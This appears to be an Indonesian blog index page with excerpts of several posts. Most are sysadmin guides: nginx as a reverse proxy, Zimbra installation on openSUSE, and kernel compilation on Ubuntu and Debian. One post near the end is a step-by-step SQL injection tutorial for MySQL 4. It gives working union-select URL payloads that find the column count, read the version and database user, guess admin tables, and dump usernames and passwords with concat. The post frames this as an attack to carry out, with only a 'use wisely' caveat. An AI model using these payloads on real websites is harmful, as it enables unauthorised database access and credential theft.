Many of us are familiar with the use of Apache for hosting websites. It might not be the fastest webserver but it is extraordinarily popular, extremely flexible, and a great choice for most people. However there are times when it can struggle, and placing a proxy in front of it can be useful.
nginx is a very small, fast, and efficient HTTP server with a lot of built in smarts to allow it to work as a reverse proxy, and not just for HTTP, it also supports SMTP.
Ditulis dalam Uncategorized
Kemarin sore saya menyempatkan diri membuat sebuah Xen Hypervisor Guest pada server dan mengisi SLES JEOS 64 bit dalam modus paravirtualization untuk digunakan sebagai media testing Zimbra Collaboration Suite 6.0.5. Selesai install,
Ditulis dalam Uncategorized
Tutorial berikut ini akan menjelaskan langkah demi langkah untuk melakukan instalasi Zimbra mail server versi 5.0.21 pada openSUSE 11.2 32 bit. Zimbra 5.0.21 adalah Zimbra versi paling update dari versi 5.x.x dan merupakan salah satu versi stabil selain versi 6.x.x.
Pada kesempatan lain saya akan menjelaskan panduan instalasi dan konfigurasi Zimbra Mail Server versi 6.x.x pada openSUSE 64 bit.
Ditulis dalam Uncategorized
Catatan : Pada saat tutorial ini dipublish, Zimbra sudah merilis Zimbra Mail Server versi 5.0.22. Secara prinsip, panduan ini tetap bisa digunakan pada Zimbra 5.0.22. Silakan sampaikan melalui komentar jika ada masalah saat implementasi Zimbra 5.0.22 pada openSUSE 11.2.
Konfigurasi ini bisa diterapkan pada openSUSE 11.0, openSUSE 11.1 dan SUSE Linux Enterprise 11 dengan sedikit penyesuaian tampilan.
Ditulis dalam Uncategorized
Building and using a custom kernel will make it very difficult to get support for your system. While it is a learning experience to compile your own kernel, you will not be allowed to file bugs on the custom-built kernel (if you do, they will be Rejected without further explanation).
Ditulis dalam Uncategorized
Version 1.0
Author: Falko Timme <ft [at] falkotimme [dot] com>
Last edited 11/05/2006
Each distribution has some specific tools to build a custom kernel from the sources. This article is about compiling a kernel on Ubuntu systems. It describes how to build a custom kernel using the latest unmodified kernel sources from www.kernel.org (vanilla kernel) so that you are independent from the kernels supplied by your distribution. It also shows how to patch the kernel sources if you need features that are not in there.
I have tested this on Ubuntu 6.10 Server (“Edgy Eft”) and Ubuntu 6.06 Desktop (“Dapper Drake”).
I want to say first that this is not the only way of setting up such a system. There are many ways of achieving this goal but this is the way I take. I do not issue any guarantee that this will work for you!
Ditulis dalam Uncategorized
Version 1.1
Author: Falko Timme <ft [at] falkotimme [dot] com>
Last edited 07/15/2005
In some cases you might want to compile your own kernel that suits your needs better than the standard kernel that comes with your distribution. I will describe how to do this on a Debian Woody machine (a description for Debian Sarge can be found here!). Please note that this tutorial is for kernel 2.6 only! A tutorial for kernel 2.4 can be found here.
Be aware that there is some risk in doing so! For example, it could happen that your machine does not boot properly after you have installed the new kernel so you might be forced to boot from a rescue CD to repair your system. You have been warned! This document comes without warranty of any kind!
Ditulis dalam Uncategorized
1. Update cache repository
Code:
# apt-get update
2. Install paket-paket yang diperlukan untuk kompilasi kernel.
Code:
Ditulis dalam Uncategorized
teknik sql injection di mysql versi 4 dan 5 sangat berbeda, di versi 5 kita menggunakan information schema untuk melihat isi table dalam database, di versi 4 kita cuma bisa menebak-nebak table yang kira-kira ada didalam database. contoh gini
1. cek vulner dengan menambahkan (‘) diakhir url
http://www.mampus.com/news.php?id=5′
jika muncul error,ada kemungkinan web ini vulner buat di injek 
2. temukan jumlah kolom (angka ajaib)
http://www.mampus.com/news.php?id=5 order by 1/* <– no error
http://www.mampus.com/news.php?id=5 order by 2/* <– no error
http://www.mampus.com/news.php?id=5 order by 3/* <– no error
http://www.mampus.com/news.php?id=5 order by 4/* <– error
berarti jumlah kolomnya ada 3
3. cek fungsi union
http://www.mampus.com/news.php?id=5 union all select 1,2,3/*
jika muncul angka di web seperti 1,2,3 berarti fungsi union udah jalan 
4. cek versi, database, user
misal setelah memakai fungsi union keluar angka 1 dan 3, berarti itu angka yang bisa kita explore dan bisa diganti dengan
version() -> untuk melihat versi mysql
database() -> untuk melihat nama database
user() -> untuk melihat nama user
ex:
misal angka yang keluar di web setelah memakai fungsi union keluar 1 dan 3, kita pilih angka 1 buat diexplore.
it should look like this http://www.mampus.com/news.php?id=5 union all select version(),2,3/*
dan akan mendapatkan hasil seperti ini 4.1.33-log atau 5.0.45, itu adalah versi dari mysqlnya..
disini akan dibahas mengenai versi 4, untuk yang versi 5 baca aja postingan sebelum ini disini.
5. mencari table dan kolom
kita hanya bisa menebak kira-kira table apa yang ada didatabase, yang umum digunakan
table names: user/s, admin/s, member/s …
column names: username, user, usr, user_name, password, pass, passwd, pwd dll…
6. coba keberuntungan
cek table admin ada or not di database dengan perintah seperti ini dengan mengexplore angka 1 tadi
http://www.mampus.com/news.php?id=5 union all select 1,2,3 from admin/*
jika muncul angka ajaib seperti perintah union tadi, berarti table admin exists!!
jika tidak muncul cari table yang lain misal user/s, member/s,author/s dll pokoknya ampe ketemu dech!
lanjut! tadikan table admin udah ada nich, selanjutnya tinggal cari kolomnya
http://www.mampus.com/news.php?id=5 union all select username,2,3 from admin/*
jika muncul angka ajaib seperti perintah union tadi, berarti kolom username di table admin ada!
misal ga muncul cari kemungkinan yang lain misal user,usr dll
kolom username dah ketemu, selanjutnya cek kolom password
http://www.mampus.com/news.php?id=5 union all select password,2,3 from admin/*
jika muncul angka ajaib seperti perintah union tadi, berarti kolom password di table admin ada!
misal ga muncul cari kemungkinan yang lain misal pass dll
kolom username dan password telah ditemukan di table admin, tinggal finishing dech, misal passwordnya ga diencrypt syukur, misal diencrypt tinggal decrypt aja..
http://www.mampus.com/news.php?id=5 union all select concat(username,0×3a,password),2,3 from admin/*
ket: 0×3a adalah bentuk hexa dari :
huh.. udah mau jam 7 pagi mo kuliah dulu yach, ntar telat ga boleh masuk ma dosennya.. hiks hiks… T.T
sekian dulu aja, maaf misal klo salah coz saya masih pemula banget (masih pemula ngasih tutor??##), levelnya dibawah pemula dech!
disini cuma share pengalaman aja coz kita tidak berhak menyembunyikan suatu ilmu, karena kita dapat ilmu itu juga bukan karena kita sendiri.. udah ah! cabut dulu…
Ref http://annotes.wordpress.com/2010/03/11/sql-injection-versi-mysql-4/
Ditulis dalam Uncategorized
hanya sekedar Info, gunakan secara bijak
Ditulis dalam Uncategorized
em44y
Em44y's Blog 